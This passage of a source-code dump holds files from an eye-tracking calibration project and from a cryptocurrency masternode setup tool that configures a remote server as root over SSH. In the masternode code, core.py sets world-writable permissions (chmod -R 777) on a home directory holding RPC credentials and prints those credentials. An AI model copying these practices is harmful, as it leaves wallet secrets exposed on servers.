    screen.fill(255)
    cv2.circle(screen, targetLoc, 10, (0, 255, 0), -1)
def save_data():
    """Placeholder for persisting collected datapoints (not implemented)."""
    pass
def game_init(screenSize, fullScreen=True):
    """Create the white game canvas with a centered red starting dot.

    Returns (screen, screenSize, targetLoc) where targetLoc is the dot
    center in (x, y) pixel coordinates.
    """
    screen = np.zeros([screenSize.height, screenSize.width, 3], dtype=np.uint8)
    screen.fill(255)  # white background
    targetLoc = (int(screenSize.width / 2), int(screenSize.height / 2))
    cv2.circle(screen, targetLoc, 10, (0, 0, 255), -1)
    if fullScreen == True:
        cv2.namedWindow("window", cv2.WND_PROP_FULLSCREEN)
        cv2.setWindowProperty("window", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
    return screen, screenSize, targetLoc
def dataReceiver(process):
    """Reader thread: scan the child's stdout for <data>...</data> frames.

    Text between a "<data>" start key and a "</data>" end key is
    accumulated into receiveBuffer; each completed frame is published via
    the global DATA.  Runs until stopReader is set or the child exits,
    then kills the child process.
    """
    global receiveBuffer, receiveStatus, DATA, stopReader
    newData = False  # NOTE(review): written but never read
    while(stopReader == False and process.poll() == None):
        outputRaw = process.stdout.readline()
        # NOTE(review): crude bytes->str via repr-slicing; escape sequences
        # stay literal — consider outputRaw.decode() instead. Confirm the
        # child's output encoding before changing.
        output = str(outputRaw.strip())[2:-1]
        index = output.find("<data>")
        if index > -1:
            receiveBuffer = ""
            output = output[index + 6:]  # drop everything up to the key
            if receiveStatus == 1:
                print("WARNING: I received a data start key without finishing my previous data read, data might be corrupted!")
            receiveStatus = 1
        index = output.find("</data>")
        if index > -1:
            receiveBuffer = receiveBuffer + output[:index]
            receiveStatus = 0
            DATA = receiveBuffer  # publish the completed frame
            newData = True
        # Mid-frame line: append it (lines are joined without newlines,
        # which JSON parsing tolerates).
        if receiveStatus == 1:
            receiveBuffer = receiveBuffer + output
    process.kill()
def startupRecognition():
    """Launch featureGrabber.py and block until it emits its first frame.

    Starts a dataReceiver thread on the child's stdout, then waits for the
    global DATA to be populated.  Returns the child process handle.
    """
    global DATA, stopReader
    process = subprocess.Popen(["python", "featureGrabber.py"], stdout=subprocess.PIPE)
    threadReader = threading.Thread(target=dataReceiver, args=(process,))
    threadReader.start()
    print("waiting for the recognition model to start up, this can take a minute")
    print("please make sure privacy cover is away from the camera")
    t = 0
    timer = 0
    # NOTE(review): busy-wait; a short time.sleep() here would spare a core.
    while process.poll() is None and len(DATA) == 0:  # wait untill first data is received
        t = t + 1
        if t > 100000:
            print(".", end='')  # progress indicator roughly once per tick
            t = 0
            timer = timer + 1
    assert len(DATA) > 0, "ERROR: something went wrong, couldn't have communication with the recognition model"
    print("took us", timer)
    print("\nlets goooo!!!")
    return process
def storeDatapoint(targetLoc):
    """Consume the pending DATA frame recorded for ``targetLoc``.

    Clears the global DATA buffer and parses it as JSON.  NOTE(review):
    the parsed result is currently discarded — nothing is persisted yet.
    """
    global DATA
    print("targetLoc:", targetLoc, "DATA:", DATA)
    data = DATA
    DATA = ""  # mark the frame as consumed before the parse
    data = json.loads(data)
def main():
    """Calibration loop for the eye-tracking data collector.

    Shows a window with a target dot; when the user presses space while fresh
    gaze data is available, the current datapoint is stored and a new dot is
    drawn. Esc quits; the loop also exits if the recognition process dies.
    """
    global stopReader
    started = False
    process = startupRecognition()
    # NOTE(review): this pyautogui size is immediately overwritten by
    # screenShape() below — dead assignment, kept as-is.
    screenSize = pyautogui.size()
    screenSize = screenShape()
    # Forced to a small 100x100 window, presumably for testing — TODO confirm.
    screenSize.width = 100
    screenSize.height = 100
    screen, screenSize, targetLoc = game_init(screenSize, fullScreen=False)
    while True:
        cv2.imshow('window', screen)
        # A green dot signals that fresh gaze data is available for capture.
        if len(DATA) > 0:
            dotGreen(screen, targetLoc)
        key = cv2.waitKey(1)
        if key == 32:  # space: capture a datapoint (or just start on first press)
            if len(DATA) > 0:
                if started:
                    storeDatapoint(targetLoc)
                else:
                    started = True
                targetLoc = create_dot(screen, screenSize)
            else:
                print("no new data")
        #cv2.putText(screen, 'face', (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2, cv2.LINE_AA)
        if key == 27:  # esc: quit and tell the reader thread to stop
            stopReader = True
            print("quitting")
            break
        if process.poll() is not None:
            print("the model stopped, will quit now too")
            stopReader = True
            break
    cv2.destroyAllWindows()
# Guard the entry point so importing this module does not launch the UI loop.
if __name__ == "__main__":
    main()
|
JortGroen/eyeMouse | src/testPrinter.py | <reponame>JortGroen/eyeMouse
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 8 19:46:44 2021
@author: djoghurt
"""
import time
import json
# Emit ten test payloads framed by <data>...</data> markers, mimicking the
# stdout protocol of featureGrabber.py so the reader thread can be exercised
# without a camera.
data = {}
data["name"] = "testPrinter"
for i in range(10):
    data["value"] = i
    json_data = json.dumps(data, indent = 4)
    # Junk before/after the markers is intentional: the receiver must locate
    # the markers anywhere in the stream, not only at line boundaries.
    print("jkljl<data>", flush=True)
    print(json_data, flush=True)
    print("</data>lkj", flush=True)
    print("", flush=True)
    print("test" + str(i), flush=True)
    time.sleep(3)
JortGroen/eyeMouse | landmarks_test.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 21 16:54:57 2020
@author: djoghurt
"""
import cv2
import numpy as np
import dlib
# Live webcam demo: detect the first face and overlay all 68 dlib facial
# landmarks with their indices. Esc quits.
cap = cv2.VideoCapture(0)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("src/3rdparty/shape_predictor_68_face_landmarks.dat")
# Landmark indices of interest (eye corners / nose area, presumably) —
# currently unused in this script.
mapping = [45, 42, 36, 39, 33]
while True:
    _, frame = cap.read()
    frame = cv2.flip(frame, 1)  # mirror the image for a natural selfie view
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = detector(gray)
    if len(faces) > 0:
        face = faces[0]  # only annotate the first detected face
        landmarks = predictor(gray, face)
        for i in range(landmarks.num_parts):
            p = landmarks.part(i)
            cv2.circle(frame, (p.x, p.y), 3, (0, 0, 255), -1)
            cv2.putText(frame, str(i), (p.x, p.y), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 1, cv2.LINE_AA)
    cv2.imshow("Output", frame)
    key = cv2.waitKey(1)
    if key == 27:  # Esc
        break
cap.release()
cv2.destroyAllWindows()
JortGroen/eyeMouse | src/test.py | <filename>src/test.py<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 15:33:26 2021
@author: djoghurt
"""
import pygame
import sys
import random
import pyautogui
screenSize = pyautogui.size()
def game_init():
    """Create a fullscreen white surface with an initial red dot at (50, 50).

    Returns:
        pygame.Surface: the display surface.
    """
    surface = pygame.display.set_mode([0, 0], pygame.FULLSCREEN)
    surface.fill((255, 255, 255))
    pygame.draw.circle(surface, (255, 0, 0), (50, 50), 20)
    pygame.display.flip()
    return surface
def create_dot(screen):
    """Draw a red dot at a random on-screen position.

    Args:
        screen: pygame surface to draw on.

    Returns:
        The same surface, with the new dot drawn.
    """
    position = (
        random.randint(1, screenSize.width),
        random.randint(1, screenSize.height),
    )
    pygame.draw.circle(screen, (255, 0, 0), position, 20)
    return screen
def game_update(screen):
    """Process pending pygame events for one frame.

    Space clears the screen and draws a fresh random dot; Q or closing the
    window requests exit.

    Returns:
        bool: False when the app should quit, True otherwise.
    """
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            return False
        if event.type != pygame.KEYDOWN:
            continue
        if event.key == pygame.K_SPACE:
            print("space")
            screen.fill((255, 255, 255))
            screen = create_dot(screen)
            pygame.display.flip()
        elif event.key == pygame.K_q:
            print("quit")
            return False
    return True
def main():
    """Run the demo event loop until the user quits."""
    surface = game_init()
    while game_update(surface):
        pass
# Script entry: initialize pygame, run the demo loop, then shut down cleanly.
pygame.init()
main()
pygame.quit()
|
JortGroen/eyeMouse | thread_test.py | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 29 17:09:56 2020
@author: djoghurt
"""
import threading
import time
import cv2 as cv
import numpy as np
def pizza(reps=10, work=10000000):
    """CPU-burn demo task: print "pizza" after each chunk of busy work.

    Generalized from hard-coded loop counts; the defaults preserve the
    original behavior for existing zero-argument callers (thread targets).

    Args:
        reps (int): number of print iterations.
        work (int): busy-loop count per iteration.
    """
    for _ in range(reps):
        x = 0
        for j in range(work):
            x = x + j
        print("pizza")
    return
def patat(reps=10, work=10000000):
    """CPU-burn demo task: print "patat" after each chunk of busy work.

    Generalized from hard-coded loop counts; the defaults preserve the
    original behavior for existing zero-argument callers (thread targets).

    Args:
        reps (int): number of print iterations.
        work (int): busy-loop count per iteration.
    """
    for _ in range(reps):
        x = 0
        for j in range(work):
            x = x + j
        print("patat")
    return
def show_colour(name):
    """Open a blank white OpenCV window named *name* and refresh it forever.

    NOTE(review): the loop never calls cv.waitKey, so on many platforms the
    window will not actually repaint; the commented-out block shows the
    original quit handling. `colour` and `i` are unused leftovers.
    """
    print("starting", name)
    #name = "1"
    colour = (255, 0, 0)
    screenSize = (20, 10)  # (width, height)
    # Note the numpy shape order: rows (height) first, then columns (width).
    screen = np.zeros([screenSize[1], screenSize[0], 3], dtype=np.uint8)
    screen.fill(255)
    i = 0
    while(True):
        cv.imshow(name, screen)
        # if cv.waitKey(1) & 0xFF == ord('q'):
        #     cv.destroyAllWindows()
        #     break
    return
# Demo: run the three worker functions concurrently in daemon threads, then
# spin until the first worker finishes.
thread1 = threading.Thread(target=pizza, name="1")
thread1.daemon = True
thread2 = threading.Thread(target=patat, name="2")
thread2.daemon = True
thread3 = threading.Thread(target=show_colour, args=("3",), name="3")
# BUG FIX: was "thread3.deamon = True" (typo) — that silently set an unused
# attribute and left the thread non-daemonic, keeping the process alive.
thread3.daemon = True
thread1.start()
thread3.start()
thread2.start()
i = 0
while(True):
    # BUG FIX: Thread.isAlive() was removed in Python 3.9; is_alive() is the
    # supported spelling on all Python 3 versions.
    if not thread1.is_alive():
        break
|
mtmonte/MasternodeSetup | MasternodeSetup/masternode.py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from . import vps
from . import core
import argparse
import configparser
CONFIG_FILENAME = os.path.join(os.path.dirname(__file__), "conf", "config.ini")
DESCRIPTION = "End to end script to setup a masternode"
ROOT_USER = "root"
def getConfig():
    """Parse the package configuration file.

    Returns:
        configparser.ConfigParser: the parsed configuration (dict-like access
        by section and option).
    """
    parser = configparser.ConfigParser()
    parser.read(CONFIG_FILENAME)
    return parser
def begin(args):
    """Wrapper function that starts the application with the given arguments.

    Args:
        args (obj): Object containing the command line arguments parsed.
    """
    try:
        # Parse file configuration
        config = getConfig()
        # Ensure all local requirements met (e.g. wallet installed)
        core.checkPrerequisites(config)
        # Setup VPS - Update packages, install binaries
        vps.setup(args.vps, ROOT_USER, args.password, config)
        # Setup masternode locally
        core.setup(args.vps, ROOT_USER, args.password, args.name, config)
    except Exception as e:
        print("Masternode setup failed. Reason: {0}.".format(str(e)))
        # Bare re-raise preserves the original traceback; "raise e" would
        # rewrite the traceback to point at this frame.
        raise
def setup():
    """Program entrypoint: parse all command line arguments and start the
    application.
    """
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    # All three options are mandatory string arguments.
    for flag, helpText in (
        ("--name", "The name to be given to the masternode"),
        ("--vps", "The IP address of the VPS server to be used"),
        ("--password", "The root password for the VPS provided"),
    ):
        parser.add_argument(flag, action="store", required=True, help=helpText)
    begin(parser.parse_args())
# Allow running this module directly as a script.
if __name__ == "__main__":
    setup()
mtmonte/MasternodeSetup | setup.py | <gh_stars>1-10
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from setuptools import setup
# Distribution metadata for the MasternodeSetup package (setuptools).
# The console script "cosmos-masternode-setup" maps to
# MasternodeSetup.command_line:main.
setup(name="Cosmos Coin Masternode Setup",
      version="1.1.0",
      description="End to end script to setup a masternode",
      url="https://github.com/mtmonte/MasternodeSetup",
      author="mtmonte",
      author_email="<EMAIL>",
      keywords="bitcoin cosmos coin crypto cryptocurrency masternode",
      license="MIT",
      packages=["MasternodeSetup"],
      python_requires=">=3.3.0",
      install_requires=["paramiko"],
      entry_points={"console_scripts": ["cosmos-masternode-setup=MasternodeSetup.command_line:main"]},
      # include_package_data pulls in the conf/ template files declared in MANIFEST.
      include_package_data=True,
      zip_safe=False)
mtmonte/MasternodeSetup | MasternodeSetup/core.py | <filename>MasternodeSetup/core.py
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import glob
import time
import json
import pprint
import string
import random
import getpass
import subprocess
from . import vps
from . import daemon
from os import environ
RPC_USER_LENGTH = 32
RPC_PASSWORD_LENGTH = 32
CONF_TEMPLATE_FILE = os.path.join(os.path.dirname(__file__), "conf", "conf.template")
ACTIVATION_STRING = "waiting for remote activation"
def checkIfEnvironmentDefined(envHome, envUser):
    """Checks if the required environment variables are defined.

    Args:
        envHome (str): The name of the home environment variable.
        envUser (str): The name of the user environment variable.

    Raises:
        ValueError: if either variable is missing from the environment
            (home is checked first, matching the original order).
    """
    for variable in (envHome, envUser):
        if variable not in environ:
            raise ValueError("Please set {0} environment variable".format(variable))
def checkIfWalletInstalled(cli, daemonCli):
    """Check if the local wallet is installed.

    Args:
        cli (str): The full path of the local cli binary.
        daemonCli (str): The full path of the local daemon binary.

    Raises:
        ValueError: if either binary path (with any suffix) does not exist.
    """
    # Glob with a trailing wildcard so platform suffixes (e.g. ".exe") match.
    for binary in (cli, daemonCli):
        if not glob.glob("{0}*".format(binary)):
            raise ValueError("Unable to find file: {0}, please check your installation".format(binary))
def setupWallet(walletConfFile):
    """This function will setup the local wallet requirements.

    Ensures the wallet conf file defines rpcuser and rpcpassword, appending
    randomly generated values for any that are missing.

    Args:
        walletConfFile (str): Full path to wallet conf file.
    """
    print("Setup wallet configuration..")
    # Read once via a context manager: the original called open(...).read()
    # twice without closing, leaking file handles.
    with open(walletConfFile) as f:
        contents = f.read()
    if "rpcuser" not in contents:
        print("Creating rpcuser setting..")
        with open(walletConfFile, "a") as f:
            f.write("rpcuser={0}\n".format(generateRandomString(RPC_USER_LENGTH)))
    if "rpcpassword" not in contents:
        print("Creating rpcpassword setting..")
        with open(walletConfFile, "a") as f:
            f.write("rpcpassword={0}\n".format(generateRandomString(RPC_PASSWORD_LENGTH)))
    print("")
def startLocalDaemon(daemonCli):
    """Start the local daemon. Required to use the coin cli.

    Args:
        daemonCli (str): The full path of the local daemon binary.

    Returns:
        Obj: The process associated with the daemon that was started.

    Raises:
        ValueError: if the daemon terminated within the 20s startup window.
    """
    print("Starting local daemon..")
    try:
        proc = daemon.start(daemonCli)
        # Counter-intuitive but deliberate: TimeoutExpired is the SUCCESS path
        # here — it means the daemon is still running after 20s. If
        # communicate() returns normally, the daemon exited, i.e. startup failed.
        proc.communicate(timeout=20)
    except subprocess.TimeoutExpired:
        pass
    else:
        raise ValueError("Failed to start local daemon")
    print("")
    return proc
def stopLocalDaemon(cli):
    """Stop the local daemon.

    Args:
        cli (str): The full path of the local cli binary.

    Raises:
        ValueError: if the stop command failed, chained to the original error.
    """
    print("Stopping local daemon..")
    try:
        daemon.stop(cli)
    except Exception as e:
        # Narrowed from a bare except (which also caught KeyboardInterrupt);
        # chaining preserves the underlying cause for debugging.
        raise ValueError("Failed to stop local daemon") from e
    print("")
def pollForWalletSync(cli):
    """Poll for the wallet to be fully synced (on daemon).

    Utilizes the blockchain info RPC call to check that verification progress
    is at least 1.00. This field is an estimate of the synchronization status.
    Checking this number ensures we are in sync with a good confidence level.

    Args:
        cli (str): The full path of the local cli binary.
    """
    print("Wait for wallet to by synchronized..")
    blockchaininfo = daemon.getBlockchainInfo(cli)
    blockchainvalues = json.loads(blockchaininfo)
    # Re-query every 5 seconds until the node reports (estimated) full
    # verification; progress is a float in [0, 1].
    while blockchainvalues["verificationprogress"] < 1:
        blockchaininfo = daemon.getBlockchainInfo(cli)
        blockchainvalues = json.loads(blockchaininfo)
        print("Progress.. {0}%".format(blockchainvalues["verificationprogress"] * 100))
        time.sleep(5)
    print("")
def getTotalUnlockedBalance(cli):
    """Get the total balance in wallet without accounting for locked coins
    (i.e. from masternodes).

    Args:
        cli (str): The full path of the local cli binary.

    Returns:
        Int: The total unlocked balance present.
    """
    output = daemon.listUnspent(cli)
    values = json.loads(output)
    # Renamed the generator variable: the original shadowed the builtin
    # `input`, which is error-prone.
    return sum(entry['amount'] for entry in values)
def unlockWallet(cli):
    """Unlocks the wallet temporarily so that other operations may be performed.

    Prompts repeatedly until the daemon accepts the passphrase.

    Args:
        cli (str): The full path of the local cli binary.
    """
    while True:
        passphrase = getpass.getpass(prompt="Please enter you wallet passphrase: ")
        try:
            daemon.unlockWallet(cli, passphrase)
        except Exception:
            # Narrowed from a bare except, which also swallowed
            # KeyboardInterrupt and made Ctrl-C unable to abort the prompt
            # loop; the dead `pass` statement was removed.
            print("Incorrect passphrase, please try again..")
        else:
            break
    print("")
def sendCollateralToAddress(cli, address, collateral):
    """Send the collateral amount to the specified address.

    Args:
        cli (str): The full path of the local cli binary.
        address (str): The address to be used for the masternode.
        collateral (int): The collateral amount to be sent.

    Returns:
        String: The txid associated with this transaction.
    """
    try:
        # If the wallet is not encrypted, no unlocking is necessary
        txid = daemon.sendToAddress(cli, address, collateral)
    except Exception:
        # Narrowed from a bare except; any send failure is treated as a
        # locked wallet, so prompt to unlock and retry once.
        print("Wallet is locked, please unlock your wallet..")
        unlockWallet(cli)
        txid = daemon.sendToAddress(cli, address, collateral)
    return txid
def getMasternodeOutput(cli, txid):
    """Get the masternode output containing the masternode txid.

    Args:
        cli (str): The full path of the local cli binary.
        txid (str): The txid associated with the collateral.

    Returns:
        Dict: A dictionary containing the masternode output.

    Raises:
        ValueError: unless exactly one output matches the txid.
    """
    values = json.loads(daemon.getMasternodeOutputs(cli))
    matches = [entry for entry in values if entry['txhash'] == txid]
    # There should be a single match, check to be sure
    if len(matches) != 1:
        raise ValueError("Transaction: {0} was not found in masternode outputs".format(txid))
    return matches[0]
def setupMasternodeTransaction(cli, label, collateral):
    """Performs a setup of the transactions required to create a masternode.
    Specifically:
    1. Check balance
    2. Generate address
    3. Send collateral to address
    4. Get masternode output
    5. Get masternode key

    Args:
        cli (str): The full path of the local cli binary.
        label (str): The label to be used when generating a new address.
        collateral (int): The collateral amount to be sent.

    Returns:
        2-Tuple: Tuple containing the masternode output and masternode key

    Raises:
        ValueError: if the unlocked balance cannot cover the collateral.
    """
    print("Setup masternode transaction..\n")
    # First check we have enough balance
    balance = getTotalUnlockedBalance(cli)
    print("Collateral required: {0}, total unlocked balance: {1}".format(collateral, balance))
    if balance < collateral:
        raise ValueError("Insufficient funds")
    # Generate new address for masternode
    address = daemon.generateNewAddress(cli, label)
    print("Send collateral to new address: {{{0}: {1}}}".format(label, address))
    # Send collateral to new address
    txid = sendCollateralToAddress(cli, address, collateral)
    print("Sent collateral successfully, txid: {0}\n".format(txid))
    # Get masternode output associated with collateral
    print("Get masternode output..")
    masternodeOutput = getMasternodeOutput(cli, txid)
    print("Masternode output:\n{0}\n".format(masternodeOutput))
    # Get masternode key to be used
    print("Get masternode key..")
    masternodeKey = daemon.generateMasternodeKey(cli)
    print("Masternode key: {0}\n".format(masternodeKey))
    return (masternodeOutput, masternodeKey)
def generateRandomString(length):
    """Generate a random string of a specified length. To be used in rpc
    information.

    Uses the OS-backed SystemRandom source, so the output is suitable for
    credentials.

    Args:
        length (int): Length of string to be generated.

    Returns:
        String: Random string drawn from [A-Za-z0-9].
    """
    rng = random.SystemRandom()
    alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits
    return ''.join(rng.choice(alphabet) for _ in range(length))
def setupVpsConfFile(server, user, password, confFile, masternodeKey):
    """Setup the vps masternode configuration file.

    Args:
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        confFile (str): The full path to the configuration file to be used.
        masternodeKey (str): The masternode key associated with this node.
    """
    print("Setup VPS conf file..")
    values = dict()
    # Generate random values for user and password
    values["rpcuser"] = generateRandomString(RPC_USER_LENGTH)
    values["rpcpassword"] = generateRandomString(RPC_PASSWORD_LENGTH)
    values["externalip"] = server
    values["masternodepivkey"] = masternodeKey
    # Parse and replace template file with values
    source = ""
    with open(CONF_TEMPLATE_FILE) as template:
        source = string.Template(template.read())
    sourceFile = source.substitute(values)
    # NOTE(review): this echoes the generated rpc credentials to stdout;
    # consider suppressing in shared environments.
    print("Generated configuration file:")
    pprint.pprint(sourceFile)
    print("")
    # Send configuration file to vps
    print("Send configuration file to VPS..")
    vps.createFileWithContents(server, user, password, confFile, sourceFile)
    print("Configuration file sent successfully!\n")
def updateVpsPermissions(server, user, password, coinName):
    """Updates the folder permissions for the coin user so that the daemon
    may run.

    NOTE(review): chmod 777 is far broader than needed; 700/750 would
    likely suffice — worth confirming before tightening.

    Args:
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        coinName (str): The name of the coin.
    """
    print("Updating folder permissions for {0} user.".format(coinName))
    vps.sendSingleCommand(server, user, password, "chmod -R 777 /home/{0}".format(coinName))
    print("")
def stopVpsDaemon(cli, daemonCli, server, user, password, coinName):
    """Stops the vps daemon if it's running.

    Args:
        cli (str): The name of the coin cli to be used.
        daemonCli (str): The name of the coin daemon to be used.
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        coinName (str): The name of the coin.
    """
    print("Stopping daemon on VPS (if running)..")
    # Open SSH connection
    channel = vps.openChannel(server, user, password)
    try:
        if vps.isProcessRunning(channel, daemonCli):
            # Stop the process if it's currently running; run the cli as the
            # coin user, since the daemon runs under that account.
            command = "su -c \"{0} stop\" {1}".format(cli, coinName)
            output = vps.sendCommand(channel, command)
            # Allow enough time for process to terminate
            time.sleep(20)
    finally:
        # Close ssh connection
        vps.closeChannel(channel)
    print("")
def startVpsDaemon(daemonCli, server, user, password, coinName):
    """Starts the vps daemon.

    Args:
        daemonCli (str): The name of the coin daemon to be used.
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        coinName (str): The name of the coin.

    Raises:
        ValueError: if the daemon is not running after the startup delay.
    """
    print("Starting daemon on VPS..")
    # Open SSH connection
    channel = vps.openChannel(server, user, password)
    try:
        # Run the daemon as the coin user rather than as root.
        command = "su -c \"{0} -daemon\" {1}".format(daemonCli, coinName)
        print(vps.sendCommand(channel, command))
        # Allow enough time for daemon to start
        time.sleep(20)
        if not vps.isProcessRunning(channel, daemonCli):
            raise ValueError("Failed to start daemon on VPS")
    finally:
        # Close ssh connection
        vps.closeChannel(channel)
def clearVpsDebugFile(server, user, password, debugFile):
    """Removes the debug file specified so later log searches start clean.

    Args:
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        debugFile (str): The name of the file to be removed.
    """
    print("Removing VPS debug file: {0}".format(debugFile))
    vps.sendSingleCommand(server, user, password, "rm -rf {0}".format(debugFile))
    print("")
def pollForVpsDaemonActivationReady(server, user, password, debugFile):
    """Waits until the daemon is ready to be activated.

    Greps the remote debug log for the activation marker every 10 seconds;
    grep's non-zero exit status (surfaced as an exception from
    sendSingleCommand) is the "not ready yet" signal.

    Args:
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        debugFile (str): The name of the file to search.
    """
    command = "grep \"{0}\" {1} > /dev/null".format(ACTIVATION_STRING, debugFile)
    while True:
        print("Wait until VPS daemon is activation ready.. This may take some time..")
        try:
            vps.sendSingleCommand(server, user, password, command)
        except Exception:
            # Narrowed from a bare except; retry after a short delay.
            time.sleep(10)
        else:
            break
    print("")
def setupVpsMasternode(cli, daemonCli, server, user, password, confFile, masternodeKey, coinName, debugFile):
    """Sets up the masternode on the VPS. Specifically:
    1. Stop daemon (if necessary).
    2. Copy masternode conf file to vps.
    3. Start daemon.

    Args:
        cli (str): The name of the coin cli to be used.
        daemonCli (str): The name of the coin daemon to be used.
        server (str): The IP address of the server to connect to.
        user (str): The username to be used in the connection.
        password (str): The password associated with the user.
        confFile (str): The full path to the configuration file to be used.
        masternodeKey (str): The masternode key associated with this node.
        coinName (str): The name of the coin.
        debugFile (str): The full path of the daemon's debug log on the VPS.
    """
    # We must stop the current daemon to prevent issues with the conf file
    stopVpsDaemon(cli, daemonCli, server, user, password, coinName)
    # Load new conf file
    setupVpsConfFile(server, user, password, confFile, masternodeKey)
    # We must update folder permissions so that daemon can run
    updateVpsPermissions(server, user, password, coinName)
    # Clear debug file so that it can be searched later
    clearVpsDebugFile(server, user, password, debugFile)
    # Start daemon
    startVpsDaemon(daemonCli, server, user, password, coinName)
    # Poll for daemon to be ready for activation
    # Note: It seems like the activation doesn't work outside of wallet so disabling for now..
    #pollForVpsDaemonActivationReady(server, user, password, debugFile)
def setupMasternodeConfFile(server, label, masternodeConfFile, masternodePort, masternodeOutput, masternodeKey):
    """Sets up the local masternode conf file with the masternode values.

    Appends one entry of the form
    "<label> <ip>:<port> <key> <txhash> <outputidx>" to the existing file.

    Args:
        server (str): The IP address of the server to connect to.
        label (str): The label to be used when generating a new address.
        masternodeConfFile (str): The full path to the masternode conf file.
        masternodePort (int): The port number associated with the masternode.
        masternodeOutput (dict): The masternode output containing the collateral txinfo.
        masternodeKey (str): The masternode key associated with this node.
    """
    print("Setup masternode conf file..")
    entry = "\n{0} {1}:{2} {3} {4} {5}".format(
        label,
        server,
        masternodePort,
        masternodeKey,
        masternodeOutput["txhash"],
        masternodeOutput["outputidx"],
    )
    with open(masternodeConfFile, 'a') as f:
        f.write(entry)
def startMasternodeAlias(cli, label):
    """Start the masternode by its alias.

    Args:
        cli (str): The name of the coin cli to be used.
        label (str): The label to be used when generating a new address.
    """
    print("Start masternode..")
    try:
        # If the wallet is not encrypted, no unlocking is necessary
        daemon.masternodeStartAlias(cli, label)
    except Exception:
        # Narrowed from a bare except; a failure is treated as a locked
        # wallet, so prompt to unlock and retry once.
        print("Wallet is locked, please unlock your wallet..")
        unlockWallet(cli)
        daemon.masternodeStartAlias(cli, label)
    print("Masternode started successfully!")
def setupWalletForMasternode(cli, server, label, masternodeConfFile, masternodePort, masternodeOutput, masternodeKey):
    """Sets up the wallet for the newly created masternode.

    Writes the masternode entry into the local conf file, then starts the
    masternode by its alias.

    Args:
        cli (str): The name of the coin cli to be used.
